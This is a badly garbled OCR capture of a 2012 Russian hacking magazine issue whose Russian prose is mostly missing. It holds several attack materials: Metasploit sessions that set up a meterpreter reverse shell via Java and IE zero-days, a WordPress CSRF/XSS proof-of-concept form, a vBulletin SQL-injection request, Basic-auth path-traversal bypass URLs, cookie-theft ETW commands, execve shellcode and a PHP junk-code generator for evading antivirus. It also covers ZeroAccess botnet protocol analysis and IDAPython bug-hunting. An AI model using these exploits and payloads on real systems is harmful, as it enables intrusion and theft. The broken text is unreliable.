"POST"

Wevtutil ;
qe event ;
c:\temp\cookiesteal.etl /lf:true -
+ ;
find /i "POST" , find.

PATH RESTRICTIONS

, ,
, 2006 (goo.gl/Pa2dJ).
(Amit Klein). ,
.
, ,
SOP (same origin policies), , , -,
, .
, (, , )
, path.
? -, ,
, - . ,
www.example.com/admin/,
, www.
example.com/admin/ , www.example.com/
admin/bla-blah/test.php.
-, , Basic-, , , - , HTTP/1.1 401 Authorization Required.
: - .
,
- Authorization: Basic + base64(:).

/bar/

11 /166/ 2012

3. :
logman stop CookieStealer

4. :
logman query providers

, , ,
gmail.
POST-. URL , , . , . ... ,
-. c
PaulDotCom.com goo.gl/fNmji.
. -,
, , WinInet API. , Opera, Chrome,
Firefox, .
-, , Microsoft-Windows-WinInet,
(. 4), ETW , :).

,
. , -
401,
realm . , WWWAuthenticate: Basic realm="cisco".
,
/Basic- www.example.com/admin/, XSS www.example.com/public/.
,
TRACE-
( ).
, , ,
JS JS .
, :).
- . -, .
, .

/asdasd/ report
Basic-

071

 / EASY HACK

Basic- /report/

Win, bar- foo

public ,
admin, . -,
, Basic :).
Basic. , Basic
, ,
. , - ,
. www.example.
com/admin/, www.example.com/admin/
bla-blah/test.php Basic-,
. , www.example.
com/public/, 401,
( , admin),
admin. ,
.
! , cookie,
Basic-.

public, , .
,
admin, - public. , ,
, , .
,
-.

072

1) www.example.com/admin/%2e%2e/public/ \
(URL-encoded "../")
- public,
IE ok, FF www.example.com/public/
.
2) www.example.com/admin/baz\..\../public/
- Windows
public, IE , FF ok.
3) www.example.com/admin/%u002e%u002e/public/ (UTF-8)
IIS , IE, FF ok.
4) www.example.com/admin%c0%ae%c0%ae/public/ (Overlong \
UTF-8)
IIS , IE, FF ok.
5) www.example.com/admin/%252e%252e /public/ (Double- \
encoded dot)
IIS , IE, FF ok.

, ,
.
-,
- :).
,
.
. , :).
!

11 /166/ 2012

 (ivinside.blogspot.com)
(115612, . , . 1)

/
x86-
.


.
, ...
.
,
!

0-day Java SE
CVE-2012-4681

CVSSV2

10.0
(AV:N/AC:L/AU:N/C:C/I:C/A:C)

BRIEF

: 26 2012
: Michael Schierl, jduck, sinn3r, juan vazquez
CVE: CVE-2012-4681
,
JDK 7: ClassFinder MethodFinder.findMethod(). ClassFinder
classForName,
JDK 6.
JDK 7 ( sun.awt.SunToolkit).
sun.swt.SunToolkit public-
getField() ,
Statement.acc, AccessControlContext,
. ,
Java-.

,
, ,
java.security.AccessController.checkPermission
,
(, ,
doPrivileged).
,
java.security.AccessControlContext java.
security.ProtectionDomain, , AccessControlContext
java.beans.Statement,
.
java.beans.Statement
, AccessControlContext
, AccessController.getContext():

EXPLOIT

JDK . ,
java.security.AccessController.checkPermission, .
,
, .

074

CVE-2012-4681 Metasploit

11 /166/ 2012

public class Statement {

private static Object[] emptyArray = new Object[]{};
static ExceptionListener defaultExceptionListener = new \
ExceptionListener() {
public void exceptionThrown(Exception e) {
System.err.println(e);
System.err.println("Continuing ...");
}
};
private final AccessControlContext acc = \
AccessController.getContext();
private final Object target;
private final String methodName;
private final Object[] arguments;
ClassLoader loader;
[...]
}

getContext() AccessControlContext
, .
, . ,
sun.awt.SunToolkit,
public-:
public static Field getField(final Class klass, final \
String fieldName){
return AccessController.doPrivileged(new \
PrivilegedAction<Field>(){
public Field run(){
try {
Field field = klass.getDeclaredField(fieldName);
assert (field != null);
field.setAccessible(true);
return field;
}
catch (SecurityException e){
assert false;
}
catch (NoSuchFieldException e){
assert false;
}
return null;
}
});
}

getField , , , .
, , , ,
, ,
. :
com.sun.deploy.*
com.sun.imageio.*
com.sun.javaws.*
com.sun.jnlp.*
com.sun.xml.internal.bind.*
com.sun.xml.internal.ws.*
sun.*

11 /166/ 2012

AccessControlException. , ,
.
java.beans.
Expression, java.beans.Statement.
Expression.execute Statement.invokeInternal. ,
Statement.invokeInternal com.sun.beans.
finder.ClassFinder.resolveClass,
com.sun.beans.finder.ClassFinder.findClass:
public static Class<?> resolveClass(String name, \
ClassLoader loader) throws ClassNotFoundException {
Class<?> type = PrimitiveTypeMap.getType(name);
return (type == null) ? findClass(name, loader): type;
}
public static Class<?> findClass(String name) throws \
ClassNotFoundException {
try {
ClassLoader loader = Thread.currentThread(). \
getContextClassLoader();
if (loader == null) {
loader = ClassLoader.getSystemClassLoader();
}
if (loader != null) {
return Class.forName(name, false, loader);
}
}
catch (ClassNotFoundException exception) {
// use current class loader instead
}
catch (SecurityException exception) {
// use current class loader instead
}
return Class.forName(name);
}

, , Class.forName,
. Class.forName
ClassLoader, JDK, ,
,
. ,
sun.awt.SunToolkit.
,

,
.
, .
Statement.invokeInternal, , com.sun.beans.finder.MethodFinder.findMethod:
public static Method findMethod(Class<?> type, String \
name, Class<?>...args) throws NoSuchMethodException {
...
method = findAccessibleMethod(new MethodFinder(name, \
args).find(type.getMethods()));
CACHE.put(signature, method);
return method;
}

075

 /
findAccessibleMethod java.lang.Class.getMethods.
com.sun.beans.finder.MethodFinder, JDK , , ,
.
, :
Statement,
System.setSecurityManager(null);
AccessControlContext ;
sun.awt.
SunToolkit;
public-
getFiled Statement.acc,

AccessControlContext;
Statement,
,
AccessControlContext .

Metasploit:
msf > use exploit/multi/browser/java_jre17_exec
msf exploit(java_jre17_exec) > set uripath exm
uripath => exm
msf exploit(java_jre17_exec) > set payload \
java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_jre17_exec) > set lhost 192.168.0.123
lhost => 192.168.0.123
msf exploit(java_jre17_exec) > show options
Module options (exploit/multi/browser/java_jre17_exec):
Name
Current Setting
-----------------SRVHOST 0.0.0.0

SRVPORT 8080

Required Description
-------- ----------yes
The local host
to listen on.
This must be an
address on the local
machine or 0.0.0.0
yes
The local port
to listen on.

SSL

false

no

SSLCert

no

SSLVersion

SSL3

no

URIPATH

exm

no

Negotiate SSL for

incoming connections
Path to a custom SSL
certificate (default
is randomly generated)
Specify the version of
SSL that should be used
(accepted: SSL2,
SSL3, TLS1)
The URI to use for
this exploit (default
is random)

Payload options (java/meterpreter/reverse_tcp):

Name
----

Current Setting
---------------

Required Description
-------- -----------

LHOST
LPORT

192.168.0.123
4444

yes
yes

The listen address

The listen port

Exploit target:
Id
--

Name
----

Generic (Java Payload)

msf exploit(java_jre17_exec) > exploit

[*] Exploit running as background job.
[*]
[*]
[*]
[*]

Started reverse handler on 192.168.0.123:4444

Using URL: http://0.0.0.0:8080/exm
Local IP: http://192.168.0.123:8080/exm
Server started.

http://192.168.0.123:8080/exm,
. .
TARGETS

Oracle JSE (Java Standard Edition) 1.7.0_06-b24 .

SOLUTION

, .

Meterpreter CVE-2012-4681

076

11 /166/ 2012

0-day use-after-free
execCommand IE

CVSSV2

9.3
(AV:N/AC:M/AU:N/C:C/I:C/A:C)

Id
-5

Name
---IE 8 on Windows 7

msf exploit(ie_execcommand_uaf) > exploit

[*] Exploit running as background job.

BRIEF

: 18 2012
: unknow, eromang, binjo, sinn3r, juan vazquez
CVE: CVE-2012-4969

[*] Using URL: http://0.0.0.0:8080/exm

[*] Local IP: http://192.168.0.123:8080/exm
[*] Server started.

in-the-wild 14 2012
, .
HTML-
CMshtmlEd, CMshtmlEd::Exec(),
use-after-free.

http://192.168.0.123:8080/exm .

EXPLOIT

, IE .

TARGETS

Microsoft Internet Explorer 69.

SOLUTION

Metasploit:
msf > use exploit/windows/browser/ie_execcommand_uaf
msf exploit(ie_execcommand_uaf) > set uripath exm
uripath => exm
msf exploit(ie_execcommand_uaf) > set target 5
target => 5
msf exploit(ie_execcommand_uaf) > set payload windows/exec
payload => windows/exec
msf exploit(ie_execcommand_uaf) > set cmd calc.exe
cmd => calc.exe
msf exploit(ie_execcommand_uaf) > show options
Module options (exploit/windows/browser/ie_execcommand_uaf):
Name
---SRVHOST

Current Setting Required Description

--------------- -------- ----------0.0.0.0
yes
The local host
to listen on. This
must be an address
on the local machine
or 0.0.0.0
SRVPORT 8080
yes
The local port
to listen on.
SSL
false
no
Negotiate SSL for
incoming connections
SSLCert
no
Path to a custom SSL
certificate (default
is randomly generated)
SSLVersion
SSL3
no
Specify the version of
SSL that should be
used (accepted: SSL2,
SSL3, TLS1)
URIPATH exm
no
The URI to use for
this exploit (default
is random)
Payload options (windows/exec):
Name
---CMD

Current Setting
--------------calc.exe

EXITFUNC process

Exploit target:

11 /166/ 2012

Required Description
-------- ----------yes
The command string
to execute
yes
Exit technique: seh,
thread, process, none

WordPress WP-TopBar

CVSSV2

6.0
(AV:N/AC:M/Au:S/C:P/I:P/A:P)

BRIEF

: 13 2012
: Blake Entrekin
WP-TopBar CSRF ( ) stored (,
) XSS, ,
.
EXPLOIT

1. CSRF. wp-topbar.php ,
POST-,
CSRF. :
<html>
<head>
<title></title>
</head>
<body>
<form name="testform" action="https://localhost/ \
wordpress/wp-admin/admin.php?page=wp-topbar.php
&action=topbartext&barid=1" method="POST"> <br>
<input type="hidden" name="wptbbartext" value= \
"</script><script>onload=alert(3)</script>">
<input type="hidden" name="wptblinktext" \
value="whatever">
<input type="hidden" name="wptblinkurl" value= \
"http%3A%2F%2Fwordpress.org%2Fextend%2Fplugins%2
Fwp-topbar%2F">
<input type="hidden" name="wptblinktarget" \
value="blank">
<input type="hidden" name="wptbenableimage" \
value="false">
<input type="hidden" name="wptbbarimage" value="">
<input type="hidden" name="update_wptbSettings" \
value="Update+Settings">
</form>
<script type="text/javascript">

077

vBulletin over 100 000

document.testform.submit();
</script>
</body>
</html>

SQL- vBulletin Yet

Another Awards System

CVSSV2

6.0
(AV:N/AC:M/Au:S/C:P/I:P/A:P)

, wptbbartext
JS,
XSS.
2. XSS. Message (
wptbbartext) wp-topbar.php
Stored Cross-site Scripting.
. :

BRIEF

: 29 2012
: Backsl@sh/Dan
Google Dork: inurl:awards.php intext:"powered by vbulletin"
SQL- Yet Another Awards System
vBulletin SQL- .
EXPLOIT

</script><script>alert(3)</script>

<script>alert(3)</script> ,
.
TARGETS

WordPress WP-TopBar 4.02 , , .

/request_award.php:
$vbulletin->input->clean_array_gpc(p, array(
award_id => TYPE_UINT,
//award_request_name => TYPE_STR,
//award_request_recipient_name => TYPE_STR,
award_request_reason => TYPE_STR,
award_request_uid => TYPE_UNIT,
));

SOLUTION

4.03 .

SQL-
YET
ANOTHER AWARDS SYSTEM

VBULLETIN

SQL-
078

$award_request_uid = $vbulletin->GPC[award_request_uid];
$db->query_write("INSERT INTO " . TABLE_PREFIX . "award_ \
requests (award_req_uid, award_rec_uid, award_req_aid,
award_req_reason) VALUES ($award_request_uid,
$award_request_uid, $award[award_id],". $db->escape_ \
string($vbulletin->GPC[award_request_reason]) .")");

$award_request_uid . :
http://[site].com/request_award.php
POST: do=submit&name=award_id=[_ID]
&award_request_reason=0
&award_request_uid=0[SQL-]&submit=Submit
TARGETS

Yet Another Awards System 4.02 , , .

SOLUTION

11 /166/ 2012

!
8-800-200-3-999
+7 (495) 663-82-77 ()

40 % .

6 1194 .
12 2149 .

6 810 .
12 1499 .

6 1110 .
12 1999 .

6 775 .
12 1399 .

6 564 .
13 1105 .

6 599 .
12 1188 .

6 1110 .
12 1999 .

6 810 .
12 1499 .

3 630 .
6 1140 .

6 895 .
12 1699 .

6 690 .
12 1249 .

6 1110 .
12 1999 .

6 1110 .
12 1999 .

6 950 .
12 1699 .

shop.glc.ru

Sanjar Satsura (satsura@r00tw0rm.com, twitter.com/!#/sanjar_satsura)

- ,
. ,
. ,
-
.
- ?
, . exploit pack, ,
,
, .
.
1. , ,
- .
(XSS, SQLi, CSRF, etc.), ,
, , .
2. 0-day /
, - Metasploit.
3. , JS,
.
, iframe, , - :).
4. PHP, , - ,
.

, ,
:). , ,
PHP. ,
, , , , .
,
, . ,
, .

080

(
, XOR),
, - .

. ,
MtE
. - ,

(), . ,
, , . ,
/, , , ,

, , /
.
, ,
.
, ,
, , , .
, ,
, . .
.
. , ,
,
. . ( )
. , .
.
,

11 /166/ 2012

,
.

,
.
:

, .
. , ,
(
), : , ()
().
PHP? ,
,
( ).
, ,
:).
-.
- PHP
Creama (, !).
32-
x86:

;
;
;
.

:
1.
function one_operand($number) {
$commands = array("bswap", "dec", "inc", "mul", "neg", \
"not");
$regs_32 = array("eax", "ecx", "edx", "ebx", "esi", \
"edi");
for($i=0; $i<$number; $i++) {
$count_c = rand(0, count($commands)-1);
$count_r = rand(0, count($regs_32)-1);
$makeup .= $commands[$count_c]." ". \
$regs_32[$count_r]. \ "\r\n";
}

11 /166/ 2012

echo $makeup;
}

2. - .
function trash_operand($number) {
$commands = array("adc", "add", "sub", "and", "cmp", \
"mov", "or", "test", "xor", "sbb");
$regs_32 = array("eax", "ecx", "edx", "ebx", "esi", \
"edi");
for($i=0; $i<$number; $i++) {
$count_c = rand(0, count($commands)-1);
$count_r = rand(0, count($regs_32)-1);
$count_r2 = rand(1, 99999999);
$makeup .= $commands[$count_c]. \
" ".$regs_32[$count_r].", ".$count_r2."\r\n";
}
echo $makeup;
}

(src/
chocotg.php).

!

- , ,
(, , ), .
, , ,

PHP. ,
(x86) PHP,
.
0.0.1 ,
.
8/16/32- , Jxx,
,
.
, ,
-
,
:
;
, VM;

081

LibTIFF PDF 18/43

VM-:
+ SHA-256

, ;
;
, .

PUSH_REG(ECX);
PUSH_REG(EBX);
MOV_REG(ESP,ECX);
INT('80');
POPA();
CALL_VARL('fffffff4');

. BlackLights
shellcode generator for Linux x86. :

return($result);
}

char code[] =
"\\x60"
"\\x31\\xc0"
"\\x31\\xd2"
"\\xb0\\x0b"
"\\x52"
"\\x68\\x6e\\x2f\\x73\\x68"
"\\x68\\x2f\\x2f\\x62\\x69"
"\\x89\\xe3"
"\\x52"
"\\x68\\x2d\\x63\\x63\\x63"
"\\x89\\xe1"
"\\x52"
"\\xeb\\x07"
"\\x51"
"\\x53"
"\\x89\\xe1"
"\\xcd\\x80"
"\\x61"
"\\xe8\\xf4\\xff\\xff\\xff"

/*pusha*/
/*xor
%eax,%eax*/
/*xor
%edx,%edx*/
/*mov
$0xb,%al*/
/*push
%edx*/
/*push
$0x68732f6e*/
/*push
$0x69622f2f*/
/*mov
%esp,%ebx*/
/*push
%edx*/
/*push
$0x6363632d*/
/*mov
%esp,%ecx*/
/*push
%edx*/
/*jmp
804839a <cmd>*/
/*push
%ecx*/
/*push
%ebx*/
/*mov
%esp,%ecx*/
/*int
$0x80*/
/*popa*/
/*call 8048393 <l1>*/;

linux_shellcodegen_null_free($result);

:
include(phpcodegen_lib.php),
linux_shellcodegen_null_free(), $result, ,
.
:
\x60\x31\xc0\x31\xd2\xb0\x52\x68\x6e\x2f\x73\x68\x68\x2f\
x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\
xe9\x9a\x83\x04\x08\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\
xff\xff\xff

, ,

, PHP , , .

X86
,
,
.
include('phpcodegen_lib.php');
function linux_shellcodegen_null_free(){
PUSHA();
XOR_REG(EAX, EAX);
XOR_REG(EDX, EDX);
MOV_B(AL,'0B');
PUSH_REG(EDX);
PUSH_L('68732f6e');
PUSH_L('69622f2f');
MOV_REG(ESP,EBX);
PUSH_REG(EDX);
PUSH_L('6363632d');
MOV_REG(ESP,ECX);
PUSH_REG(EDX);
JMP_L('0804839a');

082

- Creama.
,
:
32- ;
/
MASM (windows) ,
.
, ,
, .
phpcodegen. ( ) z0mbie:
process_randseed:

mov
imul
add

eax, randseed
eax, 214013
eax, 2531011

11 /166/ 2012

get_rnd_number:

__div:

__mul:

__exit:

mov
dec
jz
push
push
call
cmp
jb
xor
div
xchg
jmp
shr
imul
shr
pop
pop
retn

eax, randseed
randcount
__exit
ecx
edx
process_randseed
ecx, 65536 ;
__mul
;
edx, edx
;
ecx
; ECX
edx, eax
;
__exit
; >= 65536
eax, 16
eax, ecx
eax, 16
edx
ecx

PUSH_REG(EDX);
CALL $process_randseed;
CMP_L(ECX,65536);
JB($mul);
#__div:
XOR_REG(EDX, EDX);
DIV_REG(ECX)
XCHG(EDX, EAX);
JMP($exit);
#__mul:
SHR(EAX, 16);
IMUL(EAX, ECX);
SHR(EAX,16);
#__exit:
POP_REG(EDX);
POP_REG(ECX');
RETN();
}

:
, ,
, .

( ).

include('phpcodegen_lib.php');
function GRN($randseed, $randcount){
#process_randseed:
MOV_L(EAX,$randseed);
IMUL(EAX, 214013);
ADD_REG(EAX', 2531011);
MOV_REG(EAX, $randseed);
DEC_VARL($randcount);
JZ($exit);

,
, .
phpcodegen library
. , , ,

! vx! z

#get_rnd_number:
PUSH_REG(ECX);

WARNING

VM
LODSD();
PUSH_REG('EAX');
vm_fetch();

,
, , VM, .
:
class VM
{
public function __construct($data, $vc_va){
$this->_data=$data;
$this->_vcva=$vc_va;
}
public function vm_start($vc_va){
MOV_L('ESI', $vc_va);
}
public function vm_fetch(){
XOR_REG('EAX', 'EAX');
LOADSB();
PUSHA();
XOR_REG('ECX',ECX);
JMP_REG('EDI');
}
public function push_handler(){

11 /166/ 2012

}
public function call_handler(){
LODSD();
CALL_REG('EAX');
vm_fetch();
}
}
class VmCode
{
public static function virtualise($data, \
$vc_va=null)
{
return new VM($data,$vc_va);
}
}

, ,
,
SHA-256 :).

.
,

,

.

WWW
MS-REMa

: bit.ly/
OjneyJ;
z0mbie
,

: bit.
ly/OMxRd6, bit.
ly/RLk9rU, bit.ly/
R8WTBR;

PHP Codegen Library:
bit.ly/KASoye;



: vxarchiv.at;
EOF: eofproject.net.

083

(contact@netzob.org)

-


NETZOB

-
:
,
.
,
,
,
,
.
084

-
. , -
, ,
- - USB- .
,
- . .

, .
(
),
,
, :
, , .
, ,
.
.
, (NIDS) , ( ).

11 /166/ 2012

CLOSED

Active open/SYN
Passive open

Close
Close

LISTEN

Send/SYN

SYN/SYN + ACK
SYN_RCVD

. 1. &C- SDBot. .

,
. ,
,
.

Netzob. ,
, .

SYN/SYN + ACK
ACK

Close/FIN

ESTABLISHED
Close/FIN

FIN/ACK

FIN_WAIT_1
ACK
FIN_WAIT_2

CLOSE_WAIT
FIN/ACK

Close/FIN

ACK
TIME_WAIT

,
. , ICMP
, ICMP ECHO REPLY
TYPE 8 ICMP ECHO REQUEST TYPE 8. , , TCP-.
,
,
(. . 2).
Netzob .

, -

11 /166/ 2012

LAST_ACK

CLOSING

FIN/ACK

Netzob .
, : , , . ,
TCP SYN ,
ICMP ECHO REQUEST SMTP EHLO .
,
(, TCP , ).
, .
( ). ,
, (, TCP, IP, Ethernet),
.
, .
: ,
.

. ,
,
.
( ,
, , , ), ,
(, , , ASCII, DER ). , ,
, IP-, URL . . 1 C&C- SDBot.

SYN_SENT

SYN + ACK/ACK

Timeout after
two segment
lifetimes

ACK
CLOSED

. 2. TCP

.

.

, (
) ( ).
,
:
1. ,
. ,
. ,
USB (, ) (, C&C- ),
.
2. : IP-, .
3. ,
.
. VMware
VirtualBox.
4. ,
. , , , API Hooking,
.

NETZOB
,
Netzob
. , . 3, .
1:

, Netzob .

085


, . .
,
.
.
2:
. ,
, . , ,
. 3.
. , Netzob

. ,
.
. ,
.

, . , .
3:

. ,

.

NETZOB
Netzob
30 000 , Python
C. git
Debian, Gentoo, Arch Linux Windows.
Netzob x86 x64
:
:
,
XML.
,
. Netzob
.
,
, .
, Netzob ,
, PCAP, (, ).
: Netzob.
:
,
.
,
-,
.
,
, . ,
.
.
, -

086

. 3. Netzob
192.168.42.41

76.179.7.70

UDP

58 Source port: 52483

Destination port: 16464

192.168.42.41

115.22.87.69

UDP

58 Source port: 52483

Destination port: 16464

192.168.42.41

66.231.52.69

UDP

58 Source port: 52483

Destination port: 16464

192.168.42.41

190.94.221.68

UDP

58 Source port: 52483

Destination port: 16464

192.168.42.41

98.252.214.26

UDP

58 Source port: 52483

Destination port: 16464

. 4. , Wireshark

. ,
. ,

.
:
,
.
, (Wireshark,
Scapy) (Peach, Sulley).

Netzob . ,
ZeroAccess P2P .
,
. IDS/
IPS --- , ,
. ,
, ,
100 . ,
, Netzob.
botnet .

ZEROACCESS P2P

. , malware,
Wireshark.
. 4 UDP,
(192.168.42.41) 16464 IP
(76.179.7.70, 115.22.87.69, ).
.
(58 )
. , UDP,
TCP
.

11 /166/ 2012

. 6.

. 5. ()

P2P, UDP 16464.

PCAP Netzob.

NETZOB
Netzob ,
, git-:
git clone https://dev.netzob.org/git/netzob.git/

setup.py:
python setup.py build
python setup.py develop

, Netzob:
./netzob

RE_ZeroAccess, PCAP UDP.
, .

,
.
,
, 47 .

. ,

. ,
. 70% :
, 33
.

.
,
, .
getL, . 7,
, . , .

retL getL. P2P, IP-
, IP retL
. , . IP, .
IP :
[IP1] xxxx [IP2] xxxx [IP3] xxxx

Netzob:
( , ),
(
, , ), , .

. . .
(. . 5) , ,
.


Netzob
,
(. . 6). ,

11 /166/ 2012

IP- .

Netzob,
. Netzob
, IP. :
yyyy [command] 000..000 [NbIP] [IP1] xxxx [IP2] xxxx \
[IP3] xxxxx ...

NETZOB

, . 8.
, Netzob,
. , ,
IP- .

087


F0 F1 F2 F3 F4

CRC

Command

0000

NblPs

Aggregate

IP1

0000

. 7. getL

Field 1

Field 2

Field 3

Field 4

(.{,8})

getL

OOOOOOOO

(.{,8})

hex

string

hex

hex

04eca70d

getL

OOOOOOOO

f7d337d3

d039c13e

getL

OOOOOOOO

e66a669a

. 8.

Netzob .
( , CRC, ).
, , ,
IP-, , ,
TCP. Netzob , IP-
( IP
Layer 4). , .

Netzob
. , , (getL retL).
,
getF, retF, srv

,
. .
.
, . Netzob

, TCP UDP.
,
. , ,
, VirtualBox, :

,
.
, ,
. ,
. , . 9 ,
ZeroAccess Bot,
udp://115.22.87.69:16464 .

,
. ( ,
), .
:
1. OpenChannelTransition: , . (ip_source, port_source,
ip_destination, port_destination) .
2. CloseChannelTransition: .
3. SemiStochasticTransition: , ( ) ,
. , getL retL.
, ,

getL/retL. 500
. ,

.

Netzob .

.
. ,
. Netzob
, .
! z
WARNING

. ,

,

.

#!/bin/sh
vboxName="TargetWindowsXP"
vboxId="ab922c7e-1c88-404a-a9fa-87fd9d4ff59e"
snapshotId="NetzobReady"
vboxmanage controlvm $vboxName poweroff
vboxmanage snapshot $vboxName restorecurrent
vboxmanage startvm $vboxName --type headless

, Netzob
.
,

088

. 9. ZeroAccess

11 /166/ 2012

Dharm (twitter.com/sky5earcher)

IDAPYTHON

WARNING

.
,

,

.

!

IDAPython. ,
,
Python, IDA Pro.

mov ax, [+4]

cmp , \
jz short loc_761AE698
sub edx, ecx
beginloop:
mov [ecx], ax
;
inc ecx
;
inc ecx
mov ax, [ecx+edx]
cmp ax, \
; \
jnz short beginloop

UNC- \\\\ . ( \\)

( \), -
. (
, )
, .
- ,
.
.

MS08-067:

,
.
-.
:
, .
.
(). inline memcpy, , .
.
.
: , ,
, .

.
( . . ) B, - (). , B .
, .

IDA Loop Detection, findloop Immunity
Debugger, Loop colorizer .
, .
.

RPC DCOM.
UNC.

090

begin_loop:
mov eax, dword ptr [ebx]
movzx ecx,word ptr [eax]
cmp ecx,5Ch
je out_of_loop
mov eax,dword ptr [ebx]
cmp eax,dword ptr [esi]
je out_of_loop
mov eax,dword ptr [ebx]
sub eax,2
mov dword ptr [ebx],eax
jmp begin_loop

; \
;

;
;
;

.
SAP NetWeaver (CVE-2012-2611):
begin_loop:
cmp edx,2

11 /166/ 2012

mov [ebp+DataEnd], TraceInfo

jnz copy_with_unicode_conversion ;
;
mov dx, TraceInfo
mov [ebp+eax*2+var_d],dx
;
jmp loop_end
copy_with_unicode_conversion:
movzx cx, byte ptr [TraceInfo]
mov [ebp+eax*2+var_d],cx ;
loop_end:
cmp [ebp+eax*2+var_d],0
;
;
jz out_of_loop

add eax,1
;
add TraceInfo,edx
jmp begin_loop

.
. .
, .
.
( ) ,
.
,
, . . . ,
.
XnView:
begin_loop:
xor ecx,ecx
mov edx,[edi]
mov cx,[ebp+e]
imul ecx,eax

;
;

mov [edx+eax*4],ecx
mov ecx,[edi+8]
inc eax
cmp eax,ecx
jl short begin_loop

. 1.

test
jg
jmp
loc_5DEDED1E:
mov
inc
inc
inc
loc_5DEDED24:
inc
mov
cmp
jl

esi, esi
short loc_5DEDED33
short loc_5DEDED24
[edi], dx
esi
edi
edi
dword ptr [ecx+8]
edx, [ecx+8]
edx, [ecx+4]
short begin_loop

, ,
, false positives . ZERT (Zeroday Emergency Response Team) , [ecx+4],
(). Microsoft .
, :

. , .
. ?
, .
, +
.
.
Microsoft Vector Graphic rendering Engine
(CVE-2006-4868). :

cmp
jnb

mov
inc
inc
inc

begin_loop:
mov
mov
mov
test
jz
cmp
jnz

, , esi ,
- .
jnb - . ZERT
.
. ,
:

11 /166/ 2012

edx, [ecx+8]
ebx, [ecx]
dx, [ebx+edx*2]
dx, dx
short loc_5DEDED2F
dx, 20h
short loc_5DEDED1E

; 0
; 20h

esi, 0FEh
short skip_copy
[edi], dx
esi
edi
edi

091

cmp reg32, imm32

inc|add|sub|dec reg32

;
;

cmp reg32, imm32

cmp 0opnd, 1opnd

jump out_of_loop

;
; reg32
;

-:
Y ?.
inline memcpy,
.
false positive ( ) ,
, stosb/stosw/stosd, .
:
;
.

. .

.

:
1. ().
.
2. .
3. .
, .
.
4.1. .
4.2. .

,
.
. -.
, , ,
.
,
. , , . ,
.
while addr!=startaddr:
#
xref1=RfirstB(addr)
xref2=Rnext(addr,0)
#
if xref2!=0xffffffff and GetMnem(addr)!="call" and \
GetMnem(addr)!="jmp":
#
branchpoints.append(addr)
#
if xref1 == 0xffffffff:
break
addr=xref1
#
bodyaddr.append(addr)

092

. 2. IDA

, ,
mov, 0- , 1-
(.: mov [eax],ecx).
( ) , 1-
(.: 0xBAADF00D
).
for addr in bodyaddr:
if GetMnem(addr)=="mov":
# "" :
# + ,
# + +
memtypes=[3,4]
if GetOpType(addr,0) in memtypes:
# 1-
if GetOpnd(addr,1)==1:
# ,
return 1

,
.
for addr in branchpoints:
#
xref1=Rfirst(addr)
xref2=Rnext(addr,0)
#
if xref1 in bodyaddr:
#
# - 20
#
flag=SearchBodyAddr(xref2)
else:
flag=SearchBodyAddr(xref1)
if flag==1:
# -
branchpoints.remove(addr)

jump-, ,
cmp, test.
,
-.
#
cmps=['cmp','test']
# -
for count in range(5):
#

11 /166/ 2012

while GetMnem(addr) not in cmps:

addr=RfirstB(addr)
if GetMnem(addr)=="test":
# " " -,
#
# (test reg,reg cmp reg,0)
if len(branchpoints)==1:
#
print "input is exit condition!"
vulncount+=1
break
# cmp, 1- !=
if GetMnem(addr)=="cmp" and GetOpType(addr,1)!=5:
#
reg=GetOpnd(addr,0)
TraceVal(reg,addr,iters)
break
#
if GetMnem(addr)=="cmp" and GetOpType(addr,1)==5:
#
hardcoded=1
# , , j[gl]
for count in range(5):
addr=Rfirst(addr)
if GetMnem(addr) in signjumps:
vulncount+=1

(). ,
,
.
cmp test.
,
, .
.
inc reg32
cmp reg32, imm32
jnb out_loop

#
iterlist=["inc","add","sub","dec"]
#
iters=[]
#
for addr in bodyaddr:
if GetMnem(addr) in iterlist:
#
iters.append(addr)
return iters

for addr in iters:
reg=GetOpnd(addr,0)
TraceVal(reg,endaddr)

-, call, eax.
xor, , ,
.
(

11 /166/ 2012

. 3. mshtml.dll

) , ,
.
# signed/unsigned mismatch
suspectedins=["movsx","sub","add"]
#
movers=["mov","movzx"]\
# [ebp+esi],[ebp+esi+8]
memtypes=[3,4]
#
parent = GetFunctionAttr(addr,0)
while addr != parent or addr!=0xffffffff:
# -
#
if GetMnem(addr)=="push" and GetOpnd(addr,0)=="ebp":
print "prolog"
break
#
addr = RfirstB(addr)
#
if GetOpnd(addr,0)==reg:
#
if GetMnem(addr)=="call" and reg=="eax":
print reg,"returned by call"
break
#
if GetMnem(addr)=="xor":
print reg,"xored"
hardcoded=1
break
#
if GetMnem(addr) in suspectedins and addr \
not in iters:
print "suspected ins",reg,"at addr",hex(addr)
vulncount+=1
#
# : ,
#
if GetMnem(addr) in movers:
if GetOpType(addr,1)==1:
reg=GetOpnd(addr,1)
if GetOpType(addr,1) in memtypes:
print reg,"from memory"
break

, .
. ,
. z

093

D1g1 , Digital Security (twitter.com/evdokimovds)

X-Tools

WARNING

.
,

,

.

:
0vercl0k
URL:
https://github.
com/0vercl0k/rp
:
Win/Linux/FreeBSD/
Mac

:
Peleus Uhley
URL:
labs.adobe.com/
technologies/swfinvestigator
:
Windows/Linux

:
Parth Patel
URL:
https://code.google.
com/p/asef
:
Linux/Mac

ROP-

SWF

ANDROID

ROP-
(
- ). DEP (
2004 ), - .
ROP- DEP.
.
DEP, ASLR
.

ASLR,

ASLR ,

ROP-
, . JIT- .
, ROP-

rp++. ++
PE/ELF/
Mach-O x86/x64 ,

.
Intel AT&T
.

Adobe SWF Investigator GUI-,

,
SWF-
.
, .

Android Security Evaluation Framework (ASEF)

Android
.
,

.
APK-,
.
Android
Virtual Device
,
.
( , , )
. ASEF
, , ,
,
ASEF,
. :
;
;
;
;
API-

094

:
AS2/AS3 ;
SWF ;
SWF-;

SWF- (LSO- per site
).
:
SWF-;
SWF ;

Action
Message Format (AMF).
SWF Investigator
SWF- AMF-.

SWF-
AS3-.

11 /166/ 2012

:
OUSPG
URL:
code.google.
com/p/ouspg
:
Linux/BSD/Mac

$ gzip -c /bin/bash > sample.gz

$ while true
do
radamsa sample.gz > fuzzed.gz
gzip -dc fuzzed.gz > /dev/null
test $? -gt 127 && break
done

TEST CASE
Radamsa
.

:
1) ;
2) ;
3) .
Radamsa
.
, / , , .
Radamsa
,
,

:
Lavakumar Kuppan
URL:
ironwasp.org
:
Windows

:
Juuso Salonen
URL:
https://github.com/
juuso/keychaindump
:
Mac OS X

IronWASP
-.
Securitybyte 2011 .
GUI-,
,
#.


.
